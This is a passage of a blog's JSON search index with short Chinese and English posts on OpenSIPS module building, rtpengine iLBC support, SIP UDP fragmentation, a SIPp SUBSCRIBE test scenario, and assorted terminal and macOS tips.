maxfwd.c -rw-r--r-- 1 root root 2.0K Apr 20 13:56 maxfwd.d -rw-r--r-- 1 root root 77K Apr 20 13:56 maxfwd.o -rwxr-xr-x 1 root root 93K Apr 20 13:56 maxfwd.so -rw-r--r-- 1 root root 4.","title":"ch3 复制并裁剪一个模块"},{"content":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select. 
git revision: 9c2c8638e main.c compiled on 13:49:33 Apr 20 2021 with gcc 9 ","permalink":"https://wdd.js.org/opensips/module-dev/l2/","summary":"环境说明 ubuntu 20.04 opensips 2.4 克隆仓库 由于github官方的仓库clone太慢,最好选择从国内的gitee上克隆。\n下面的gfo, gco, gl, gcb都是oh-my-zsh中git插件的快捷键。建议你要么安装oh-my-zsh, 或者也可以看看这些快捷方式对应的底层命令是什么 https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git\ngit clone https://gitee.com/wangduanduan/opensips.git gfo 2.4:2.4 gco 2.4 gl gcb home_location #基于2.4分支创建home_location分支 安装依赖 apt update apt install -y build-essential bison flex m4 pkg-config libncurses5-dev \\ rsyslog libmysqlclient-dev \\ libssl-dev mysql-client libmicrohttpd-dev libcurl4-openssl-dev uuid-dev \\ libpcre3-dev libconfuse-dev libxml2-dev libhiredis-dev 编译安装 make all -j4 include_modules=\u0026#34;db_mysql\u0026#34; make install include_modules=\u0026#34;db_mysql\u0026#34; 测试 ➜ opensips git:(home_location) opensips -V version: opensips 2.4.9 (x86_64/linux) flags: STATS: On, DISABLE_NAGLE, USE_MCAST, SHM_MMAP, PKG_MALLOC, F_MALLOC, FAST_LOCK-ADAPTIVE_WAIT ADAPTIVE_WAIT_LOOPS=1024, MAX_RECV_BUFFER_SIZE 262144, MAX_LISTEN 16, MAX_URI_SIZE 1024, BUF_SIZE 65535 poll method support: poll, epoll, sigio_rt, select.","title":"ch2 初始化环境"},{"content":"Intro Sonic is a fast, lightweight and schema-less search backend. It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","permalink":"https://wdd.js.org/posts/2021/04/kvg1r9/","summary":"Intro Sonic is a fast, lightweight and schema-less search backend. 
It ingests search texts and identifier tuples that can then be queried against in a microsecond\u0026rsquo;s time.\ninstall ref https://github.com/valeriansaliou/sonic https://crates.io/crates/sonic-server ","title":"learn Sonic"},{"content":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。\n","permalink":"https://wdd.js.org/posts/2021/04/gt9iss/","summary":"今天发现一个问题,按住command + tab, 已经切换到对应的应用图标上,但是松开按键之后,屏幕并没有切换到新的App屏幕上。特别是那些全屏的应用。\n看了很多资料,都是没啥用的,最后发现\nhttps://apple.stackexchange.com/questions/112350/cmdtab-does-not-work-on-hidden-or-minimized-windows 最终发现,需要设置调度中心的 切换到某个应用时,会切换到包含该应用程序的打开的窗口空间, 这个必需要勾选。","title":"command + tab 无法切换窗口了?"},{"content":"ilbc的编码特定是占用带宽小,并且抗丢表。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库\nRUN echo \u0026#34;deb http://www.deb-multimedia.org stretch main\u0026#34; \u0026gt;\u0026gt; /etc/apt/sources.list \\ \u0026amp;\u0026amp; apt-get update \\ \u0026amp;\u0026amp; apt-get install deb-multimedia-keyring -y --allow-unauthenticated \\ \u0026amp;\u0026amp; apt-get install libilbc-dev libavcodec-dev libilbc2 -y --allow-unauthenticated 
安装依赖之后,继续构建rtpengine, rtpengine构建完之后,执行rtpengine --codecs\n","permalink":"https://wdd.js.org/opensips/ch9/rtpengine-ilbc/","summary":"ilbc的编码特点是占用带宽小,并且抗丢包。但是rtpengine是不支持ilbc编码的,可以参考的资料有以下两个\nhttps://github.com/sipwise/rtpengine/issues/897 https://sr-users.sip-router.narkive.com/f3jhDeyU/rtpengine-and-ilbc-support 使用rtpengine --codecs可以打印出rtpengine支持的编解码\nrtpengine --codecs PCMA: fully supported PCMU: fully supported G723: fully supported G722: fully supported QCELP: supported for decoding only G729: supported for decoding only speex: fully supported GSM: fully supported iLBC: not supported opus: fully supported vorbis: fully supported ac3: fully supported eac3: fully supported ATRAC3: supported for decoding only ATRAC-X: supported for decoding only AMR: fully supported AMR-WB: fully supported PCM-S16LE: fully supported MP3: fully supported 下面的操作基于debian:9-slim的基础镜像构建的,在构建rtpengine之前,我们先编译ilbc的依赖库","title":"rtpengine 增加对ilbc编解码的支持"},{"content":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 
有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会用。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!\n","permalink":"https://wdd.js.org/posts/2021/04/zf3xgd/","summary":"当你需要解释一个概念的时候,图形化的展示是最容易让人理解的方式。\n以前我一直用processon来绘制, processon的优点很多,用过的都知道。\n但是缺点也是非常明显的。\n定价过高 不支持离线使用 虽然processon的使用体验还不错,但是对我个人来说,使用的频率并不高 免费的会员最多只有19个文件可以使用 有一年,我的文件超过了19个,我就只能买会员了。会员到期后,我就没有续费,因为使用的频率太低。\n关于processon定价 我们横向对比一下几个互联网产品的收费标准, 从下表可以看出,Processon的定价不菲。\n项目 收费标准 最低年费用 processon 升级到个人版 159/年 159 语雀会员 标准99 限时特惠69/年 69 印象笔记 - 标准 8.17/月- 高级 12.33/月- 专业 16.50/月 - 标准 98- 高级 148- 专业 198 b站大会员 连续包年 6.3折 148/年 - 148 爱奇艺 - 黄金VIP会员 首年138/年,次年续费218 - 138 网易云音乐 - 连续包年 99 - 99 draw.io 是什么 draw.io的功能涵盖了processon的很多功能,但是其最大的卖点是**免费。(**圈住,要考!)\n但是免费的东西不好用,也不一定有人会用。但是draw.io在免费的基础上,做到了使用体验还不错,这就难能可贵了。\n最早接触的是draw.io的在线版,直到最近才发现,原来draw.io也有桌面客户端的,而且还可以离线使用。\n太爽了,果断下载体验。\n下载地址:https://github.com/jgraph/drawio-desktop/releases\n从release Notes上可以看出,draw.io的客户端基本上是全平台兼容了, 因为是基于Electron做的,不想兼容都不行啊!","title":"draw.io居然有桌面客户端了"},{"content":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我现在觉得,人和动物的区别应该是,人会问自己: 我为什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳上爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。\n","permalink":"https://wdd.js.org/posts/2021/04/qb6asq/","summary":"最近几个月,一直有些不顺心的事情让我烦恼。\n下了扶梯,走在站台上往火车上,往二号车厢走去。同行的陌生人行色匆匆,无一逗留。\n动车的车头上,不知道是碰到了什么东西,染了一大片黄色的污渍,仿佛是撞到不知名的动物而留下的痕迹。车灯宛如一个大号的三角眼,直勾勾的往前望着,不知道在想些什么。\n突然我的脑子里迸射出一个问题: 人为什么活着?\n记得以前课本上说,人和动物的区别是人会使用工具。但是我现在觉得,人和动物的区别应该是,人会问自己: 我为什么活着。而动物凭本能行动,似乎并不会考虑活着这么深奥的问题。\n一只蚂蚁在一根绳上爬,只有两个方向,要么前进,要么后退。有个蚂蚁似乎发现了第三个方向,就是可以绕着绳子转圈圈。而会转圈圈的蚂蚁,似乎就是那个容易烦恼的蚂蚁。\n这是我第一次考虑人为什么活着这个问题。回首过去,我觉得自己是个动物,凭借本能生活,饿了就吃,累了就睡。\n感觉每一天都是一个周期函数,永不停止的重复上下波动。\n最近刚好对声纹识别有些兴趣,在这个领域,有个技术叫做傅里叶变换。就是把一个时域的信号转换成频域的信号。实际的物理作用并没有变化,只是看待事物的角度发生变化,而看到的东西却不一样了。\n我觉得我也需要对我的生活做个傅里叶变换,找到一些能解决我困惑的答案。","title":"人为什么活着"},{"content":" 现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 
以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太大了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致以下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the\none indicated in the top Via, the value in the top Via MUST be\nchanged. This prevents fragmentation of messages over UDP and\nprovides congestion control for larger messages. However,\nimplementations MUST be able to handle messages up to the maximum\ndatagram packet size. For UDP, this size is 65,535 bytes, including\nIP and UDP headers.\nThe 200 byte \u0026ldquo;buffer\u0026rdquo; between the message size and the MTU\naccommodates the fact that the response in SIP can be larger than\nthe request. This happens due to the addition of Record-Route\nheader field values to the responses to INVITE, for example. With\nthe extra buffer, the response can be about 170 bytes larger than\nthe request, and still not be fragmented on IPv4 (about 30 bytes is consumed by IP/UDP, assuming no IPSec). 1300 is chosen when\npath MTU is not known, based on the assumption of a 1500 byte\nEthernet MTU. 
RFC 3261 18.1.1\n但是使用TCP来传输也有缺点,就是比使用UDP更占用资源。\n如何发现问题 用tcpdump在路径中抓包,然后使用wireshark分析抓包文件的大小分布。\n如何减少包的尺寸 移除无用的SIP头或者无用的SDP信息, 以opensips脚本为例子 # 可以通过$ml来获取消息的长度 if ($ml \u0026gt; 1300) { xlog(\u0026#34;L_WARN\u0026#34;,\u0026#34;$ci $rm $si $fu: message big then 1300: $ml\u0026#34;); } if ($ml \u0026gt;= 1500) { xlog(\u0026#34;L_ERR\u0026#34;,\u0026#34;$ci $rm $si $fu: message to big than 1500 $ml\u0026#34;); sl_send_reply(\u0026#34;513\u0026#34;,\u0026#34;Message too big\u0026#34;); } # 可以通过remove_hf和codec_delete来移除多余的消息 if(is_present_hf(\u0026#34;User-Agent\u0026#34;)) { remove_hf(\u0026#34;User-Agent\u0026#34;); } if (codec_exists(\u0026#34;Speex\u0026#34;)) { codec_delete(\u0026#34;Speex\u0026#34;); } 使用SIP头压缩技术,opensips中也有头压缩的模块 注意不要在脚本中随意使用append_hf去给SIP消息增加头 参考 https://www.yay.com/faq/voip-network/udp-maximum-mtu-size/ https://www.ibm.com/support/pages/sending-large-sip-request-exceeds-mtu-value-might-not-switch-udp-tcp http://www.rfcreader.com/#rfc3261_line6474 https://www.ecg.co/blog/125-sip-and-fragments-together-forever https://en.wikipedia.org/wiki/IP_fragmentation https://thomas.gelf.net/blog/archives/Smaller-SIP-packets-to-avoid-fragmentation,27.html http://www.evaristesys.com/blog/sip-udp-fragmentation-and-kamailio-the-sip-header-diet/ ","permalink":"https://wdd.js.org/opensips/ch7/big-udp-msg/","summary":"现象 有了开源的框架,我们可以很方便的运行一个VOIP系统。但是维护一个VOIP系统并非那么简单。特别是如果经常出现一些偶发的问题,需要用经验丰富的运维人员来从不同层面分析。\n其中UDP分片,也可能是原因之一。\n简介 以太网的最大MTU一般是1500字节,减去20字节的IP首部,8字节的UDP首部,UDP能承载的数据最大是1472字节。\n如果一个SIP消息的报文超过1472就会分片。(实际上,如果网络的MTU比1500更小,那么达到分片的尺寸也会变小)\n如下图,发送方通过以太网发送了4个报文,ABCD。其中D报文太大了,而被分割成了三个报文。在传输过程中,D的一个分片丢失,接收方由于无法重新组装D报文,所以就将D报文的所有分片都丢弃。\n这将会导致以下问题\n发送方因接收不到响应,所以产生了重传 丢弃的分片导致其他的分片浪费了带宽 IP分片对发送者来说是简单的,但是对于接收者来说,分片的组装将会占用更多的资源 RFC 3261中给出建议,某些情况下可以使用TCP来传输。\n当MTU是未知的情况下,如果消息超过1300字节,则选择使用TCP传输 当MTU是已知情况下,SIP的消息的大小如果大于MTU-200, 则需要使用TCP传输。留下200字节的余量,是因为SIP消息的响应可能大于SIP消息的请求,为了避免响应消息超过MTU,所以要留下200字节的余量。 If a request is within 200 bytes of the path MTU, or if it is 
larger than 1300 bytes and the path MTU is unknown, the request MUST be sent\nusing an RFC 2914 [43] congestion controlled transport protocol, such\nas TCP. If this causes a change in the transport protocol from the","title":"UDP分片导致SIP消息丢失"},{"content":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 光标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! !!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang\n","permalink":"https://wdd.js.org/posts/2021/04/nqs50g/","summary":"在ubuntu上执行命令,经常会出现下面的报错:\ntcpdump: eno1: You don\u0026#39;t have permission to capture on that device (socket: Operation not permitted) 这种报错一般是执行命令时,没有加上sudo\n快速的解决方案是:\n按向上箭头键 ctrl+a 光标定位到行首 输入sudo 按回车 上面的步骤是比较快的补救方案,但是因为向上的箭头一般布局在键盘的右下角,不移动手掌就够不着。一般输入向上的箭头时,右手会离开键盘的本位,会低头看下键盘,找下向上的箭头的位置。\n有没有右手不离开键盘本位,不需要低头看键盘的解决方案呢?\n答案就是: sudo !! 
!!会被解释成为上一条执行的命令。sudo !!就会变成使用sudo执行上一条命令。\n快试试看吧 sudo bang bang","title":"sudo !!的妙用"},{"content":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;![CDATA[ SIP/2.0 200 OK [last_Via:] [last_From:] [last_To:] [last_Call-ID:] [last_CSeq:] Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;!-- \u0026lt;nop\u0026gt; \u0026lt;action\u0026gt; \u0026lt;exec int_cmd=\u0026#34;stop_now\u0026#34;/\u0026gt; \u0026lt;/action\u0026gt; \u0026lt;/nop\u0026gt; --\u0026gt; \u0026lt;!-- definition of the response time repartition table (unit is ms) --\u0026gt; \u0026lt;ResponseTimeRepartition value=\u0026#34;10, 20, 30, 40, 50, 100, 150, 200\u0026#34;/\u0026gt; \u0026lt;!-- definition of the call length repartition table (unit is ms) --\u0026gt; \u0026lt;CallLengthRepartition 
value=\u0026#34;10, 50, 100, 500, 1000, 5000, 10000\u0026#34;/\u0026gt; \u0026lt;/scenario\u0026gt; 定义配置文件 #!/bin/bash # conf.sh edge_address=\u0026#39;192.168.40.88:18627\u0026#39; my_ext=\u0026#39;8003\u0026#39; my_domain=\u0026#39;ss.cc\u0026#39; my_monitor=\u0026#39;8004\u0026#39; 定义状态码处理函数 用来处理来自sipp的返回的状态码\n#!/bin/bash # util.sh log_error () { case $1 in 0) echo INFO: test success ;; 1) echo ERROR: At least one call failed ;; 97) echo ERROR: Exit on internal command. Calls may have been processed ;; 99) echo ERROR: Normal exit without calls processed ;; -1) echo ERROR: Fatal error ;; -2) echo ERROR: Fatal error binding a socket ;; *) echo ERROR: Unknow exit code $0 ;; esac } 启动文件 -key 用来定义变量,在场景文件中存在三个变量 [my_ext] 当前分机号 [my_domain] 当前分机域名 [my_monitor] 当前分机想要监控的分机号 -recv_timeout 表示设置接受消息的超时时间为1000毫秒 -timeout 设置整个运行过程的超时时间 -sf 指定场景文件 -m 设置最大处理的呼叫数 -l 设置并发呼叫数量 -r 设置呼叫速度 #!/bin/bash # test.sh source ../util.sh source ./conf.sh rm *.log sipp -trace_logs $edge_address \\ -key my_ext $my_ext \\ -key my_domain $my_domain \\ -key my_monitor $my_monitor \\ -recv_timeout 1000 \\ -timeout 2 \\ -sf ./subscibe.xml -m 1 -l 1 -r 1; log_error $? 
执行测试: chmod +x test.sh ./test.sh sngrep 抓包 ","permalink":"https://wdd.js.org/opensips/tools/sipp-subscriber/","summary":"时序图 场景解释 step1: SUBSCRIBE 客户端想要订阅某个分机的状态 step2: 200 Ok 服务端接受了这个订阅消息 step3: NOTIFY 服务端向客户端返回他的订阅目标的状态 step4: 200 Ok 客户端返回表示接受 场景文件 \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;iso-8859-2\u0026#34; ?\u0026gt; \u0026lt;!DOCTYPE scenario SYSTEM \u0026#34;sipp.dtd\u0026#34;\u0026gt; \u0026lt;scenario name=\u0026#34;subscibe wait notify\u0026#34;\u0026gt; \u0026lt;send retrans=\u0026#34;500\u0026#34;\u0026gt; \u0026lt;![CDATA[ SUBSCRIBE sip:[my_monitor]@[my_domain] SIP/2.0 Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=[branch] From: sipp \u0026lt;sip:[my_ext]@[my_domain]\u0026gt;;tag=[call_number] To: \u0026lt;sip:[my_monitor]@[my_domain]:[remote_port]\u0026gt; Call-ID: [call_id] CSeq: [cseq] SUBSCRIBE Contact: sip:[my_ext]@[local_ip]:[local_port] Max-Forwards: 10 Event: dialog Expires: 120 User-Agent: SIPp/Win32 Accept: application/dialog-info+xml, multipart/related, application/rlmi+xml Content-Length: 0 ]]\u0026gt; \u0026lt;/send\u0026gt; \u0026lt;recv response=\u0026#34;200\u0026#34; rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;!","title":"subscribe场景测试"},{"content":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","permalink":"https://wdd.js.org/posts/2021/04/hh661g/","summary":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possile 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 
https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","title":"iterm2 光标消失了"},{"content":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎和backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不在tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.\nThe trick is to make sure that PATH is empty before path_helper runs. In my ~/.bash_profile file I have this:\nif [ -f /etc/profile ]; then PATH=\u0026quot;\u0026quot; source /etc/profile fi\n\u0026gt; Clearing PATH before path_helper executes will prevent it from prepending the default PATH to your (previously) chosen PATH, and will allow the rest of your personal bash setup scripts (commands further down `.bash_profile`, or in `.bashrc` if you\u0026#39;ve sourced it from `.bash_profile`) to setup your PATH accordingly. 
\u0026gt; ```bash if [ -f /etc/profile ]; then PATH=\u0026#34;\u0026#34; source /etc/profile fi cat /etc/profile # 我有这个文件 PATH=\u0026#34;\u0026#34; source /etc/profile 总之,按照sf上的操作,我的问题解决了,图片弹出了。\n参考 https://stackoverflow.com/questions/62423342/python-plot-in-tmux-session-not-showing https://blog.csdn.net/Meditator_hkx/article/details/59106752 https://superuser.com/questions/544989/does-tmux-sort-the-path-variable ","permalink":"https://wdd.js.org/posts/2021/03/pqreg4/","summary":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎和backend没有设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不在tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.","title":"matplotlib图片弹窗没有弹出"},{"content":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf
https://github.com/sfluor/musig ","title":"#shazam算法分析"},{"content":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.pcf -V: Print version information and exit -u delay (0 - 10, default 4): Screen update delay -C [color]: Use this color for matrix (default green) -r: rainbow mode -m: lambda mode ","permalink":"https://wdd.js.org/posts/2021/03/fgutiw/","summary":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. 
